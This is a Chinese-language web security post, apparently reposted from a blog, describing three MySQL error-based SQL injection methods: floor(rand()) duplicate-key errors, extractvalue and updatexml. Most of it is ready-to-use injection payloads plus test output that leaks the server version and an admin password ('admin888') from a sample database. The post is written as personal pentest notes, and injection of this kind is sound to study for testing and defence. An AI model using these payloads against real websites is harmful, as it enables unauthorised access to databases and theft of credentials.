关于Mysql注入过程中的三种报错方式 - 网站安全

放点原来的笔记，Mysql在执行语句的时候会抛出异常信息信息，而php+mysql架构的网站往往又将错误代码显示在页面上，这样可以通过构造如下三种方法获取特定数据。

 

实际测试环境：

 

1 mysql> show tables;

2 +----------------+

3 | Tables_in_test |

4 +----------------+

5 | admin          |

6 | article        |

7 +----------------+

1 mysql> describe admin;

2 +-------+------------------+------+-----+---------+----------------+

3 | Field | Type             | Null | Key | Default | Extra          |

4 +-------+------------------+------+-----+---------+----------------+

5 | id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |

6 | user  | varchar(50)      | NO   |     | NULL    |                |

7 | pass  | varchar(50)      | NO   |     | NULL    |                |

8 +-------+------------------+------+-----+---------+----------------+

1 mysql> describe article;

2 +---------+------------------+------+-----+---------+----------------+

3 | Field   | Type             | Null | Key | Default | Extra          |

4 +---------+------------------+------+-----+---------+----------------+

5 | id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |

6 | title   | varchar(50)      | NO   |     | NULL    |                |

7 | content | varchar(50)      | NO   |     | NULL    |                |

8 +---------+------------------+------+-----+---------+----------------+

1、通过floor报错

 

可以通过如下一些利用代码

 

1 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x

2 from information_schema.tables group by x)a);

1 and (select count(*) from (select 1 union select null union select !1)x

2 group by concat((select table_name from information_schema.tables limit 1),

3 floor(rand(0)*2)));

举例如下：

首先进行正常查询：

 

1 mysql> select * from article where id = 1;

2 +----+-------+---------+

3 | id | title | content |

4 +----+-------+---------+

5 |  1 | test  | do it   |

6 +----+-------+---------+

假如id输入存在注入的话，可以通过如下语句进行报错。

 

1 mysql> select * from article where id = 1 and (select 1 from

2 (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

3 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。

例如我们需要查询管理员用户名和密码：

Method1:

 

1 mysql> select * from article where id = 1 and (select 1 from

2 (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x

3 from information_schema.tables group by x)a);

4 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

 

1 mysql> select * from article where id = 1 and (select count(*)

2 from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),

3 floor(rand(0)*2)));

4 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2、ExtractValue

测试语句如下

 

1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

 

1 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,

2 (select pass from admin limit 1)));--

3 ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml

测试语句

 

1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

实际测试过程

 

www.2cto.com

 

1 mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,

2 (select pass from admin limit 1),0x5e24),1));

3 ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

All, thanks foreign guys.

 

 

 

link:http://blog.ourren.com/2012/11/03/pentest_method_of_mysql_error. html

查看更多关于关于Mysql注入过程中的三种报错方式 - 网站安全的详细内容...